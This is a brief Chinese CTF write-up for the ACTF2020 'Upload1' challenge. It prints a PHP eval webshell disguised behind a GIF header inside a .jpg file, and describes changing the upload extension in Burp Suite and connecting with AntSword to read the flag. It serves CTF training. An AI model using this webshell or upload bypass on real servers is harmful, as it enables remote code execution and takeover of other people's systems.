1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
投笔丶从戎1 小时前
Kotlin Multiplatform--01:项目结构基础Lary_Rock2 小时前
Android 编译问题 prebuilts/clang/host/linux-x86王江奎2 小时前
Android FFmpeg 交叉编译全指南:NDK编译 + CMake 集成limingade3 小时前
手机打电话通话时如何向对方播放录制的IVR引导词声音ALe要立志成为web糕手3 小时前
[BJDCTF2020]EzPHPhepherd4 小时前
Flutter 环境搭建 (Android)_一条咸鱼_4 小时前
揭秘 Android ListView:从源码深度剖析其使用原理_一条咸鱼_4 小时前
深入剖析 Android NestedScrollView 使用原理_一条咸鱼_4 小时前
揭秘 Android ScrollView:深入剖析其使用原理与源码奥秘